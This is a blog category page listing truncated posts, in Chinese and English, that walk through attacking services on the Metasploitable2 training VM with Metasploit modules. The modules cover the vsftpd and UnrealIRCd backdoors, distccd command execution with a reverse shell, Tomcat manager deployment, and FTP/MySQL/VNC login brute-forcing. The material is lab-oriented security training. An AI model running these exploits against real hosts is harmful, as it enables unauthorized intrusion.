Metasploitable2
文章平均质量分 63
Nixawk
这个作者很懒,什么都没留下…
展开
-
Metasploitable2 - tcp port 5432 - postgres
msf auxiliary(postgres_readfile) > show options Module options (auxiliary/admin/postgres/postgres_readfile): Name Current Setting Required Description ---- --------------- -原创 2014-07-31 23:51:09 · 1193 阅读 · 0 评论 -
Metasploit2: tcp port 111 – rpcbind
Metasploit2: tcpport 111 – rpcbindRPC& portmapper (111 TCP + other UDP)portmapper服务是这样工作的:当我连接portmapper端口时,表明我想使用一个指定的RPC服务。portmapper会告诉我该使用哪个端口.(RPC是RemoteProcedure Call的简称,类似与执行远程主机上原创 2014-07-29 23:38:32 · 8548 阅读 · 0 评论 -
Metasploitable2 - tcp port 8180 - tomcat
msf > use exploit/multi/http/tomcat_mgr_deploymsf exploit(tomcat_mgr_deploy) > show options Module options (exploit/multi/http/tomcat_mgr_deploy): Name Current Setting Required De原创 2014-08-01 00:45:56 · 1893 阅读 · 0 评论 -
rlogin - 512/513/514 - without password
rlogin简介远程登录(rlogin)是一个UNIX命令,它允许授权用户进入网络中的其它UNIX机器并且就像用户在现场操作一样。一旦进入主机,用户可以操作主机允许的任何事情,比如:读文件、编辑文件或删除文件等。Rlogin:远程登录命令rlogin:RemoteLogin in Unix systems实验环境原创 2014-09-06 14:50:45 · 3432 阅读 · 0 评论 -
Metasploit2 - tcp port 21 - vsftpd
Metasploitable2: tcp port 21 - vsftpdMetasploitable2的21号端口,运行的是vsftp服务。该版本的源码被攻击者植入了后门。后门很快被移除,但是还是有部分人下载了它。如果登录的用户名结尾是“:)”[笑脸],那么在6200端口会监听一个后门.msf> use exploit/unix/ftp/vsftpd_234_ba原创 2014-07-29 23:36:32 · 1350 阅读 · 0 评论 -
Metasploitable2 - tcp port 2049 - NFS
nfs 2049/tcp #Network File System - Sun Microsystemsshilp 2049/tcp #nfs 2049/udp #Network File System - Sun Microsystemsshilp 2049/udp #nfs --原创 2014-07-31 22:46:30 · 1710 阅读 · 0 评论 -
Metasploitable2 - tcp port 3632 - distccd
msf exploit(distcc_exec) > set RHOST 192.168.1.111RHOST => 192.168.1.111msf exploit(distcc_exec) > run[*] Started reverse double handler[*] Accepted the first client connection...[*] Accep原创 2014-07-31 23:44:12 · 921 阅读 · 0 评论 -
Metasploitable2 - tcp port 6667 - ircd
msf > use exploit/unix/irc/unreal_ircd_3281_backdoormsf exploit(unreal_ircd_3281_backdoor) > show options Module options (exploit/unix/irc/unreal_ircd_3281_backdoor): Name Current Settin原创 2014-08-01 00:07:36 · 1000 阅读 · 0 评论 -
Metasploitable2 - tcp port 3306 - mysql
msf auxiliary(mysql_login) > show options Module options (auxiliary/scanner/mysql/mysql_login): Name Current Setting Required Description ---- ---------------原创 2014-07-31 23:42:13 · 1933 阅读 · 0 评论 -
Metasploitable2 - tcp port 5900 - vnc
msf > use auxiliary/scanner/vnc/vnc_loginmsf auxiliary(vnc_login) > set RHOSTS 192.168.1.111RHOSTS => 192.168.1.111msf auxiliary(vnc_login) > set BLANK_PASSWORDS trueBLANK_PASSWORDS => truem原创 2014-08-01 00:00:57 · 1571 阅读 · 0 评论 -
Metasploitable2 - tcp port 2121 - Proftp
msf > use auxiliary/scanner/ftp/ftp_login msf auxiliary(ftp_login) > set USERNAME msfadminUSERNAME => msfadminmsf auxiliary(ftp_login) > set PASSWORD msfadminPASSWORD => msfadminmsf auxiliar原创 2014-07-31 23:26:24 · 2365 阅读 · 0 评论 -
Metasploit2 - tcp port 1099 - RMI
Java 远程方法调用(Remote Method Invocation, RMI)使得运行在一个 Java 虚拟机(Java Virtual Machine, JVM)的对象可以调用运行另一个 JVM 之上的其他对象的方法,从而提供了程序间进行远程通讯的途径。RMI 是 J2EE 的很多分布式技术的基础。推荐阅读: http://www.blogjava.net/boddi/archive/20原创 2014-07-31 22:06:56 · 936 阅读 · 0 评论 -
Metasploit2: tcp port 139/445 – Samba smbd
Metasploit2: tcpport 139 – netbios-ssnWindows系统开启139端口,可用工具psshutdown.exe远程关闭电脑.Samba可运行在MicrosoftWindows外的系统,例如:UNIX, Linux, IBM System, OpenVMS和其他的系统.Samba使用的是TCP/IP协议.它允许主机与Windows客户端原创 2014-07-30 00:15:56 · 5037 阅读 · 0 评论